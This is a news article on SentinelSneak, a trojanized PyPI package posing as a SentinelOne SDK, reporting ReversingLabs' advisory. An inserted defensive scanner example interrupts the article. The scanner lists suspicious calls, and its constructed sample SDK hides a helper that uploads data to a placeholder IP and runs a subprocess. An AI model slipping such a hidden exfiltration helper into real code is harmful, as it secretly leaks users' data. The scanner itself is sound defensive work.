Malicious Python Trojan Impersonates SentinelOne Security Client

Published: 23/11/2024   Category: security

A fully functional SentinelOne client is actually a Trojan horse that hides malicious code within; it was found lurking in the Python Package Index repository ecosystem.



In the latest supply chain attack, an unknown threat actor has created a malicious Python package that appears to be a software development kit (SDK) for a well-known security client from SentinelOne. 
According to an advisory from cybersecurity firm ReversingLabs issued on Monday, the package, dubbed SentinelSneak, appears to be a fully functional SentinelOne client and is currently under development with frequent updates appearing on the Python Package Index (PyPI), the main repository for Python code. 
SentinelSneak does not attempt malicious actions when it is installed; instead, it waits for its function to be called by another program, researchers noted. As such, the attack highlights attackers' focus on the software supply chain as a way to inject compromised code into targeted systems as a beachhead for further attacks. So far, those further attacks have likely not happened, researchers said.
“A cursory glance at the source of this package would have easily missed the malicious functionality injected in the otherwise legitimate SDK code,” says Tomislav Pericin, chief software architect at ReversingLabs.
The attack also demonstrates a common way to attack the supply chain: use a variant of typosquatting to create malicious packages that bear names similar to well-known open source components. Often called dependency confusion, the technique was used against the Node Package Manager (npm) ecosystem for JavaScript programs in an attack dubbed IconBurst, according to research published in July.

In another typosquatting attack, a threat group uploaded at least 29 clones of popular software packages to PyPI.
“The SentinelOne imposter package is just the latest threat to leverage the PyPI repository and underscores the growing threat to software supply chains, as malicious actors use strategies like typosquatting to exploit developer confusion and push malicious code into development pipelines and legitimate applications,” ReversingLabs stated in its advisory.
While code repositories of all kinds are under attack, overall the npm ecosystem has suffered more malicious attention than the Python Package Index. In 2022, 1,493 malicious packages were uploaded to PyPI, a drop of nearly 60% from the 3,685 malicious uploads detected by ReversingLabs in 2021, the company stated.
In the latest effort, the fake SentinelOne 1.2.1 package raises many red flags, the advisory stated. The suspicious behaviors include executing files, creating new processes, and communicating with external servers by IP address rather than by domain name.
ReversingLabs stressed that the client has no connection to SentinelOne besides using the security firm's name. The PyPI package appears to be an SDK that helps simplify programmatic access to the client.
“It could be that malicious actors are attempting to draft on SentinelOne’s strong brand recognition and reputation, leading PyPI users to believe that they have deployed SentinelOne’s security solution, without taking the — necessary — step of becoming a SentinelOne customer,” ReversingLabs stated in its advisory. “This PyPI package is intended to serve as an SDK to abstract the access to SentinelOne’s APIs and make programmatic consumption of the APIs simpler.”
In a statement to Dark Reading, SentinelOne reiterated that the package is fake: “SentinelOne is not involved with the recent malicious Python package leveraging our name. Attackers will put any name on their campaigns that they think may help them deceive their intended targets; however, this package is not affiliated with SentinelOne in any way. Our customers are secure, we have not seen any evidence of compromise due to this campaign, and PyPI has removed the package.”
The attack also shows that developers are becoming an increasing target of attackers, who see them as a weak point in targeted companies' defenses, as well as a potential way to infect those companies' customers.
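One way a reviewer can automate a first pass over the red flags listed above before installing a new dependency, as an added example that is not code from ReversingLabs, SentinelOne or the page: a small static scanner built on Python's `ast` module that flags calls to process-creation and dynamic-execution functions and string literals containing hard-coded IP addresses. The SDK snippet it scans is constructed for the example; the `tenant.example.invalid` endpoint and the 203.0.113.5 address (a documentation range) are placeholders, not indicators from the advisory.

```python
import ast
import ipaddress
import re
from pathlib import Path
from typing import Dict, List, Tuple

# Call targets that an API-wrapper SDK rarely needs: process creation, file
# execution and dynamic code evaluation. A heuristic list, not an exhaustive one.
SUSPICIOUS_CALLS = {
    "os.system", "os.popen", "os.execv", "os.execve", "os.startfile",
    "subprocess.run", "subprocess.Popen", "subprocess.call",
    "subprocess.check_call", "subprocess.check_output",
    "exec", "eval", "compile", "__import__",
}

# Dotted-quad candidates inside any string literal, e.g. "http://203.0.113.5/x".
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

Finding = Tuple[int, str, str]  # (line number, kind, detail)


def _dotted_name(node: ast.AST) -> str:
    """Rebuild 'a.b.c' from a Name/Attribute chain; '' for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def scan_source(source: str, filename: str = "<module>") -> List[Finding]:
    """Flag suspicious calls and hard-coded IP literals in one Python file."""
    findings: List[Finding] = []
    for node in ast.walk(ast.parse(source, filename=filename)):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in SUSPICIOUS_CALLS:
                findings.append((node.lineno, "call", name))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            for candidate in IPV4_RE.findall(node.value):
                try:
                    ip = ipaddress.ip_address(candidate)  # rejects e.g. 999.1.1.1
                except ValueError:
                    continue
                if not ip.is_loopback:  # 127.x is common in test code; skip it
                    findings.append((node.lineno, "ip-literal", candidate))
    return sorted(findings)


def scan_package(root: str) -> Dict[str, List[Finding]]:
    """Scan every .py file under an unpacked package directory (e.g. an sdist)."""
    report: Dict[str, List[Finding]] = {}
    for path in Path(root).rglob("*.py"):
        found = scan_source(path.read_text(encoding="utf-8"), str(path))
        if found:
            report[str(path)] = found
    return report


# Constructed sample: a plausible API wrapper plus one helper that nothing in
# the public functions calls, which is exactly the shape a skim would miss.
SAMPLE_SDK = '''\
import json
import subprocess
import urllib.request

API = "https://tenant.example.invalid/api"

def list_agents(token):
    req = urllib.request.Request(API + "/agents", headers={"Authorization": "Token " + token})
    return json.load(urllib.request.urlopen(req))

def _telemetry(data):
    urllib.request.urlopen("http://203.0.113.5/upload", data=data)
    subprocess.run(["uname", "-a"])
'''

if __name__ == "__main__":
    for line, kind, detail in scan_source(SAMPLE_SDK, "sample_sdk.py"):
        print(f"sample_sdk.py:{line}: {kind}: {detail}")
```

Run it against a downloaded source distribution with `scan_package("/path/to/unpacked-sdist")` rather than against an installed package, so nothing from the candidate is ever imported or executed during review; findings are a prompt for a closer manual read, not a verdict.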
In September, for example, attackers used stolen credentials and a development Slack channel to compromise game developer Rockstar Games and gain access to sensitive data, including assets for the developer's flagship Grand Theft Auto franchise.
For that reason, companies should help their developers understand which software components could pose a risk, Pericin says.
“Developers should put new project dependencies under a higher degree of scrutiny before opting to install them,” he says. “Given that the malware only activates when used, not when installed, a developer might have even built a new app on top of this malicious SDK without noticing anything odd.”
In the case of SentinelSneak, the threat actor behind the Trojan horse published five additional packages, using variations on the SentinelOne name. The variations appear to be tests and did not have a key file that encapsulated much of the malicious functionality.
ReversingLabs reported the incident to the PyPI security team on Dec. 15, the company said. SentinelOne was notified the next day.
“We've caught this malicious package very early,” the company said. “There's no indication that anybody has yet been affected by this malware.”
Story was updated to include a statement from SentinelOne.
